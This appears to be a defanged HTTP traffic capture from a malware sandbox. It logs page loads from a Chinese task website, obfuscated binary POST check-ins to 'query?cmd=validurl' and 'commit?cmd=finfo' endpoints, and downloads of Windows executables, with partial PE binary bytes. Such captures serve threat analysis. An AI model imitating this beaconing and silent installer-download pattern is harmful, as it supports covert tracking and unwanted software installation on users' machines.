:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}f
igure{margin:1em 40px}hr{height:0;-webkit-box-sizing:content-box;-moz-
box-sizing:content-box;box-sizing:content-box}pre{overflow:auto}code,k
bd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input
,optgroup,select,textarea{margin:0;font:inherit;color:inherit}button{o
verflow:visible}button,select{text-transform:none}button,html input[ty
pe=button],input[type=reset],input[type=submit]{-webkit-appearance:but
ton;cursor:pointer}button[disabled],html input[disabled]{cursor:defaul
t}button::-moz-focus-inner,input::-moz-focus-inner{padding:0;borde
<<< skipped >>>

GET /Public/respond/1.4.2/respond.min.js HTTP/1.1


Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:53 GMT
Content-Type: application/javascript
Content-Length: 4381
Last-Modified: Sat, 14 Mar 2015 18:06:30 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "550478a6-111d"
Expires: Sat, 07 Nov 2015 16:59:53 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
/*! Respond.js v1.4.2: min/max-width media query polyfill * Copyright 
2013 Scott Jehl.. * Licensed under hXXps://github.com/scottjehl/Respon
d/blob/master/LICENSE-MIT.. *  */..!function(a){"use strict";a.matchMe
dia=a.matchMedia||function(a){var b,c=a.documentElement,d=c.firstEleme
ntChild||c.firstChild,e=a.createElement("body"),f=a.createElement("div
");return f.id="mq-test-1",f.style.cssText="position:absolute;top:-100
em",e.style.background="none",e.appendChild(f),function(a){return f.in
nerHTML='­<style media="' a '"> #mq-test-1 { width: 42px; }&
lt;/style>',c.insertBefore(e,d),b=42===f.offsetWidth,c.removeChild(
e),{matches:b,media:a}}}(a.document)}(this),function(a){"use strict";f
unction b(){u(!0)}var c={};a.respond=c,c.update=function(){};var d=[],
e=function(){var b=!1;try{b=new a.XMLHttpRequest}catch(c){b=new a.Acti
veXObject("Microsoft.XMLHTTP")}return function(){return b}}(),f=functi
on(a,b){var c=e();c&&(c.open("GET",a,!0),c.onreadystatechange=function
(){4!==c.readyState||200!==c.status&&304!==c.status||b(c.responseText)
},4!==c.readyState&&c.send(null))};if(c.ajax=f,c.queue=d,c.regex={medi
a:/@media[^\{] \{([^\{\}]*\{[^\}\{]*\}) /gi,keyframes:/@(?:\-(?:o|moz|
webkit)\-)?keyframes[^\{] \{(?:[^\{\}]*\{[^\}\{]*\}) [^\}]*\}/gi,urls:
/(url\()['"]?([^\/\)'"][^:\)'"] )['"]?(\))/g,findStyles:/@media *([^\{
] )\{([\S\s] ?)$/,only:/(only\s )?([a-zA-Z] )\s?/,minw:/\([\s]*min\-wi
dth\s*:[\s]*([\s]*[0-9\.] )(px|em)[\s]*\)/,maxw:/\([\s]*max\-width\s*:
[\s]*([\s]*[0-9\.] )(px|em)[\s]*\)/},c.mediaQueriesSupported=a.mat
<<< skipped >>>

GET /Public/bootstrap/3.3.5/css/bootstrap.min.css?1.0.247 HTTP/1.1


Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:53 GMT
Content-Type: text/css
Content-Length: 122543
Last-Modified: Mon, 12 Oct 2015 17:10:25 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "561be981-1deaf"
Expires: Sat, 07 Nov 2015 16:59:53 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
/*!.. * Bootstrap v3.3.5 (hXXp://getbootstrap.com).. * Copyright 2011-
2015 Twitter, Inc... * Licensed under MIT (hXXps://github.com/twbs/boo
tstrap/blob/master/LICENSE).. *//*! normalize.css v3.0.3 | MIT License
 | github.com/necolas/normalize.css */html{font-family:sans-serif;-web
kit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}arti
cle,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav
,section,summary{display:block}audio,canvas,progress,video{display:inl
ine-block;vertical-align:baseline}audio:not([controls]){display:none;h
eight:0}[hidden],template{display:none}a{background-color:transparent}
a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,stro
ng{font-weight:700}dfn{font-style:italic}h1{margin:.67em 0;font-size:2
em}mark{color:#000;background:#ff0}small{font-size:80%}sub,sup{positio
n:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top
:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}f
igure{margin:1em 40px}hr{height:0;-webkit-box-sizing:content-box;-moz-
box-sizing:content-box;box-sizing:content-box}pre{overflow:auto}code,k
bd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input
,optgroup,select,textarea{margin:0;font:inherit;color:inherit}button{o
verflow:visible}button,select{text-transform:none}button,html input[ty
pe=button],input[type=reset],input[type=submit]{-webkit-appearance:but
ton;cursor:pointer}button[disabled],html input[disabled]{cursor:defaul
t}button::-moz-focus-inner,input::-moz-focus-inner{padding:0;borde
<<< skipped >>>

GET /View/Home/Task/css.base.css?1.0.247 HTTP/1.1


Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:55 GMT
Content-Type: text/css
Content-Length: 4860
Last-Modified: Mon, 19 Oct 2015 03:49:41 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "56246855-12fc"
Expires: Sat, 07 Nov 2015 16:59:55 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
html,body {..  overflow-x: hidden;..}..body {..  background: #ebebeb;.
.  position: relative;...font-family: "Helvetica Neue","Microsoft YaHe
i","............",Helvetica,Tahoma,Arial,STXihei,sans-serif;..}..a{.. 
 color: #333;..}..a:hover,a:focus {..  color: #f60;..  text-decoration
: none;..}..a:focus {..  outline: thin dotted;..  outline: 5px auto -w
ebkit-focus-ring-color;..  outline-offset: -2px;..}../*bootstrap field
set*/..fieldset{..}..legend{...width:auto;..}../*bootstrap family*/../
*model*/...modal-scrollbar-measure {...display:none..}../*bootstrap na
v*/...navbar{...margin:0px;...border:none;...border-radius: 0;..}...na
vbar-inverse .navbar-nav>li>a{..  color: #fff;..}...navbar-inver
se .navbar-nav>li>a:hover{..  color: #999;..}...navbar-inverse .
navbar-nav>.active>a,...navbar-inverse .navbar-nav>.active>
;a:focus,...navbar-inverse .navbar-nav>.active>a:hover{..  color
: #ddd;..  background-color:#080808;..}...navbar-collapse{...font-size
: 1.1em;..}../*bootstrap page*/...pagination > li > a,...paginat
ion > li > span {..  position: relative;..  float: left;..  padd
ing: 6px 12px;..  margin: 0px 5px;..  line-height: 1.45;..  color: #22
2;..  text-decoration: none;..  background-color: #fff;..  border: 1px
 solid #ddd;..}...pagination > li.disabled > a{..  font-weight: 
bold;...}...pagination > li > a:hover,...pagination > li >
 span:hover,...pagination > li > a:focus,...pagination > li &
gt; span:focus {..  color: #2cab93;..  background-color: #eee;..  
<<< skipped >>>

GET /View/Home/Task/css.task.css?1.0.247 HTTP/1.1


Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:55 GMT
Content-Type: text/css
Content-Length: 2042
Last-Modified: Mon, 19 Oct 2015 07:02:19 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "5624957b-7fa"
Expires: Sat, 07 Nov 2015 16:59:55 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
/*task inc*/..h4,h4 a{..  color: #F60;..}..h4 a:hover{..  color: #333;
..}../*channel/list/tag*/...dc-item li{..  margin-bottom: 20px;..  ove
rflow: hidden;..}...dc-item p{ ..  line-height: 2.0;..}...dc-item p.le
ad{...color: #666;...margin: 0px;...font-size: 1.0em;..}...dc-item p.l
ead a{...color: #666;...margin-left: 5px;..}...dc-item p.lead a:hover{
...color: #017e66;..}...dc-item p.lead .btn-sm{...padding:2px 4px;...m
argin:2px;..}...dc-item p.info{...color: #888;...font-size: 1.0em;..}.
..dc-item-hot li{...color: #f60;...padding: 5px 0;..}../*detail*/..a.d
c-prev{...margin-right:10px;..}...dc-task{...padding-top:10px;..  marg
in-bottom: 15px;...color: #333;...font-size: 1.25em;...overflow: hidde
n;..}...dc-task p{...line-height:1.4em;..}...dc-task .score{...font-si
ze:1.0em;...color:#666;..}...dc-task .score em{...color: #F30;...margi
n:0 5px;...font-style:normal;...font-size:1.4em;..}...dc-task .cycle{.
..font-size:1.0em;...color: #F30;...margin:0 5px;...font-weight:normal
;..}...dc-task-pad{...padding:40px 0;..}...dc-content{..  margin-botto
m: 15px;...font-size: 1.2em;..  line-height: 1.8em;...color: #555;...o
verflow: hidden;..}...dc-content a{..  color: #f60;..}...dc-content a:
hover{..  color: #333;..}...dc-content .nav-tabs{..  margin-top:15px;.
.}...dc-content .tab-content{..  padding-top: 15px;..}...dc-content .a
pply{..  padding:20px 0;..  text-align: center;..}...dc-content .dc-im
age{...margin:0 auto;..}...dc-content table td{..  padding-left: 10px;
..}...dc-content pre {...border-radius: 0;..  margin: 1.64em 0;.. 
<<< skipped >>>

GET /Public/bootstrap/3.3.5/js/bootstrap.min.js?1.0.247 HTTP/1.1


Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:57 GMT
Content-Type: application/javascript
Content-Length: 36816
Last-Modified: Tue, 16 Jun 2015 01:13:22 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "557f7832-8fd0"
Expires: Sat, 07 Nov 2015 16:59:57 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
/*!. * Bootstrap v3.3.5 (hXXp://getbootstrap.com). * Copyright 2011-20
15 Twitter, Inc.. * Licensed under the MIT license. */.if("undefined"=
=typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery
"); function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split("."
);if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1)throw new Error
("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher")}(jQ
uery), function(a){"use strict";function b(){var a=document.createElem
ent("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransiti
on:"transitionend",OTransition:"oTransitionEnd otransitionend",transit
ion:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:
b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a
(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d
).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(fu
nction(){a.support.transition=b(),a.support.transition&&(a.event.speci
al.bsTransitionEnd={bindType:a.support.transition.end,delegateType:a.s
upport.transition.end,handle:function(b){return a(b.target).is(this)?b
.handleObj.handler.apply(this,arguments):void 0}})})}(jQuery), functio
n(a){"use strict";function b(b){return this.each(function(){var c=a(th
is),e=c.data("bs.alert");e||c.data("bs.alert",e=new d(this)),"string"=
=typeof b&&e[b].call(c)})}var c='[data-dismiss="alert"]',d=function(b)
{a(b).on("click",c,this.close)};d.VERSION="3.3.5",d.TRANSITION_DURATIO
N=150,d.prototype.close=function(b){function c(){g.detach().trigge
<<< skipped >>>


POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 123
Connection: Keep-Alive

.#4H.......O.............................................................................to-24564<92$oeQk|Ngax;so}....... !
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35991274551213477898110712
Server: Apache
tracecode: 35991274551213477898110712
Set-Cookie: BAIDUID=005B09C6D83A1A4BCA2EF032D9175BBE:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive

.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00016551091911494410110713
Server: Apache
tracecode: 00016551091911494410110713
Set-Cookie: BAIDUID=69DAC83DF6D595A311E23693EE9228DF:FG=1; expires=Sun, 06-Nov-16 05:00:01 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 123
Connection: Keep-Alive

.#4H.......O.............................................................................to-24564<92$oeQk|Ngax;so}....... !
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00008213770658453514110713
Server: Apache
tracecode: 00008213770658453514110713
Set-Cookie: BAIDUID=32F3C5706F8B24028AF7668DD8FF2F78:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /commit?cmd=finfo HTTP/1.1
Content-Length: 543
Connection: Keep-Alive

.#4H........................................!#$%&"k." ,-.
3234!~
:9:;[email protected]_.b[Z[\U.ebabcK/\ehijc'Wlopqv?Nwvwx}4A~}~......................................................................................................... .........?.m...
..........&'...l..j..._...........5..Pe%......Z..6.......Y...B....4....q...{.k..Q,7.c=(.`^.{...0.r*..&=.z&
,...^.......f....!.......z....c..wg...N...{aP. ...7..KZ.?..j.....R.|...:..........Qb_...~l .0.s...o..xf.d.=9...I....E(.y....d."[email protected].;^}..Y....
.M.......
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00137261760315632138110713
Server: Apache
tracecode: 00137261760315632138110713
Set-Cookie: BAIDUID=67699F784E2A0D23D0594A86343DB7B0:FG=1; expires=Sun, 06-Nov-16 05:00:13 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /query?cmd=validurl HTTP/1.1
Content-Length: 96
Connection: Keep-Alive

.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00101112390271667466110713
Server: Apache
tracecode: 00101112390271667466110713
Set-Cookie: BAIDUID=BA43C3B59B01A15F5DD3D9CDD70F255F:FG=1; expires=Sun, 06-Nov-16 05:00:10 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



GET /invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; QQPCMgr7.0)
Host: dlied6.qq.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 302 Found
Server: nws 1.2.15
Connection: close
Date: Sat, 07 Nov 2015 05:00:16 GMT
Expires: Sat, 07 Nov 2015 05:00:16 GMT
Cache-Control: max-age=0
Content-Length: 89
Location: hXXp://103.7.29.215/dlied6.qq.com/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe?mkey=563da395da60d437&f=2384&p=.exe
The actual URL is '/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_1
0_9_16345_222.exe'...



POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive

.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00024935640818948618110713
Server: Apache
tracecode: 00024935640818948618110713
Set-Cookie: BAIDUID=B2053B857F2258D2E04896EB7F862B42:FG=1; expires=Sun, 06-Nov-16 05:00:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



GET /fcgi-bin/downurlquery?id=71960&guid=CQEjCF9zN8adOLEQHMvLiQgs3ZUZbbIyM0pyzn9CtE/lP8pJq+u226+i+UWFFd+D&ver=8.1.4016.301 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; QQPCMgr7.0)
Host: c.pc.qq.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:15 GMT
Server: HTTP Load Balancer/2.0
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 672
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
Cache-Control: no-cache
Pragma: no-cache
9 pYvSlibR11BBHT94yIhGPAt79f8hv 7svHsaQzYjRmLcqv1LAwkIvcgP7soaYd8xihkt
DkjBh41ybhkE A/W QeiOxDawh 5QfOgNOZcRQzGOx18PeWfALa2zzBVzX  mlyOKd4C7W
/vxy330jna us6KFWIPTONKYHpcUatFiVy5Y5gUYnNI4uHDLhKesCQLdNHqLAbsIrEL0mu
XpsiZuySxm5Wh6cwBxK6jy5jBPSfaL5oGQmZHK8fyw3yLYcGDz4yWYuKaw ofWxwWEBtQh
eKnfk2DFlZTRBhcBWHtzYVbHtd4WWEOYHFFoBIFvAQwNF/cTCsEayNFZ4wKacBfliiM4Qo
eIR1MCS1aFzbmqfyFWYh6rJLbA6mSglP2KPL2wqy0hLYPnUs/0SQhcyggh/akSwJQHfL2S
s6wZfJIGJ5kkNsbpkw0gIrGe INDDKXcYjvmckjr36Mw5IFom0hWnfqJke4zDNaWuvzEWv
Toloip OFdM7c2MsfWzE1Cb tyeGhlaFWg5mJbjsGruvQwQpbiVs0 b8DuNGWrnKskmSJZ
PEHWBjsAwZ7C4BpbNAwzEiZOeQ64AqfWW4KoaGYH7H49zIVSkhD9CP8GV2fHUnI1sX Bpt
P6c6PW5IEkjTob5lyfr/oyNgpdc4lJ4md9NfI0LdgPHTTP/1.1 200 OK..Date: Sat, 
07 Nov 2015 05:00:15 GMT..Server: HTTP Load Balancer/2.0..Last-Modifie
d: Thu, 01 Jan 1970 00:00:00 GMT..Content-Length: 672..Keep-Alive: tim
eout=5, max=100..Connection: Keep-Alive..Content-Type: application/oct
et-stream..Cache-Control: no-cache..Pragma: no-cache..9 pYvSlibR11BBHT
94yIhGPAt79f8hv 7svHsaQzYjRmLcqv1LAwkIvcgP7soaYd8xihktDkjBh41ybhkE A/W
 QeiOxDawh 5QfOgNOZcRQzGOx18PeWfALa2zzBVzX  mlyOKd4C7W/vxy330jna us6KF
WIPTONKYHpcUatFiVy5Y5gUYnNI4uHDLhKesCQLdNHqLAbsIrEL0muXpsiZuySxm5Wh6cw
BxK6jy5jBPSfaL5oGQmZHK8fyw3yLYcGDz4yWYuKaw ofWxwWEBtQheKnfk2DFlZTRBhcB
WHtzYVbHtd4WWEOYHFFoBIFvAQwNF/cTCsEayNFZ4wKacBfliiM4QoeIR1MCS1aFzbmqfy
FWYh6rJLbA6mSglP2KPL2wqy0hLYPnUs/0SQhcyggh/akSwJQHfL2Ss6wZfJIGJ5kkNsbp
kw0gIrGe INDDKXcYjvmckjr36Mw5IFom0hWnfqJke4zDNaWuvzEWvToloip OFdM7c2Ms
fWzE1Cb tyeGhlaFWg5mJbjsGruvQwQpbiVs0 b8DuNGWrnKskmSJZPEHWBjsAwZ7C
<<< skipped >>>


GET /17476535.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: js.users.51.la
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 1862
Content-Type: application/x-javascript
Last-Modified: Fri, 07 Aug 2015 04:22:10 GMT
Accept-Ranges: bytes
ETag: "cc562aa1c8d0d01:339f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 07 Nov 2015 04:44:38 GMT
Connection: close
document.write ('<a href="hXXp://VVV.51.la/?17476535" target="_blan
k" title="51.La 网站流量统计ߏ
B;统">网站统计</a>\n');..var a6
535tf="51la";var a6535pu="";var a6535pf="51la";var a6535su=window.loca
tion;var a6535sf=document.referrer;var a6535of="";var a6535op="";var a
6535ops=1;var a6535ot=1;var a6535d=new Date();var a6535color="";if (na
vigator.appName=="Netscape"){a6535color=screen.pixelDepth;} else {a653
5color=screen.colorDepth;}..try{a6535tf=top.document.referrer;}catch(e
){}..try{a6535pu =window.parent.location;}catch(e){}..try{a6535pf=wind
ow.parent.document.referrer;}catch(e){}..try{a6535ops=document.cookie.
match(new RegExp("(^| )a6535_pages=([^;]*)(;|$)"));a6535ops=(a6535ops=
=null)?1: (parseInt(unescape((a6535ops)[2])) 1);var a6535oe =new Date(
);a6535oe.setTime(a6535oe.getTime() 60*60*1000);document.cookie="a6535
_pages=" a6535ops  ";path=/;expires=" a6535oe.toGMTString();a6535ot=do
cument.cookie.match(new RegExp("(^| )a6535_times=([^;]*)(;|$)"));if(a6
535ot==null){a6535ot=1;}else{a6535ot=parseInt(unescape((a6535ot)[2]));
 a6535ot=(a6535ops==1)?(a6535ot 1):(a6535ot);}a6535oe.setTime(a6535oe.
getTime() 365*24*60*60*1000);document.cookie="a6535_times=" a6535ot ";
path=/;expires=" a6535oe.toGMTString();}catch(e){}..try{if(document.co
okie==""){a6535ops=-1;a6535ot=-1;}}catch(e){}..a6535of=a6535sf;if(a653
5pf!=="51la"){a6535of=a6535pf;}if(a6535tf!=="51la"){a6535of=a6535tf;}a
6535op=a6535pu;try{lainframe}catch(e){a6535op=a6535su;}..a6535src=
<<< skipped >>>


POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 102
Connection: Keep-Alive

.#4H.......:R6.f............................77.9:;TIJOznm.)k'78""#b.!".<??=49x..w75<1gXWQM...ghijklmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00008958911911494410110713
Server: Apache
tracecode: 00008958911911494410110713
Set-Cookie: BAIDUID=32F3C5706F8B2402BD0EB1E10803435C:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /query?cmd=validurl HTTP/1.1
Content-Length: 114
Connection: Keep-Alive

.#4H.......F..>.............................#.)* DYZ
..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK..
ijkl
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00033318230271667466110713
Server: Apache
tracecode: 00033318230271667466110713
Set-Cookie: BAIDUID=37CF03EF72C69E44B1D413F21243AFB1:FG=1; expires=Sun, 06-Nov-16 05:00:03 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive

.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00016873191213477898110713
Server: Apache
tracecode: 00016873191213477898110713
Set-Cookie: BAIDUID=69DAC83DF6D595A39DEA8B5044D5BB76:FG=1; expires=Sun, 06-Nov-16 05:00:01 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



GET /package/201511/7c9ddd8b4b286eef807bc97513948574.exe HTTP/1.1
Host: dlsw.br.baidu.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP3/2.0.13
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: application/octet-stream
Content-Length: 7981400
Connection: keep-alive
ETag: "5638867b-79c958"
Last-Modified: Tue, 03 Nov 2015 10:03:39 GMT
Expires: Fri, 19 Oct 2018 09:08:15 GMT
Age: 244305
Cache-Control: max-age=93312000
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...........N..,N..,
N..,G.&,O..,UC;,U..,UC.,...,G.6,S..,N..,{..,UC., ..,UC.,...,UC?,O..,UC
8,O..,RichN..,........PE..L...X.8V......................q.............
[email protected]......`z...@.......................
...........l..........X|m...........y.X.....y......,..................
.....m.......m..@...............4............................text.....
.......................... ..`.rdata..hn.......p..................@..@
[email protected]..........................
[email protected]|m......~m.................@[email protected].....
[email protected]..................................................
......................................................................
......................................................................
......................................................................
............................................h$...h..I..A..........3...
.j.Y.....t....t.!.......).........H.F...|.3.......@.."|......9.....~..
.....k...............j.Y.....u............=..H...3.j.Y.....u.........3
.1.....}..............j.[....u.!.....A...|.3.1.....}..............j.[.
...u.!.....A...|.3.......@...|.9.....~.......k...............j.Y.....u
.............3.j.Y.....u.....................;.~.k...............j.Y..
...u.............3.j.Y.....u.........3....j.[..3.C;.u.!.............A.
..|.3.......@...|.9.....~.......k...............j.Y.....u.........
<<< skipped >>>


POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive

.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
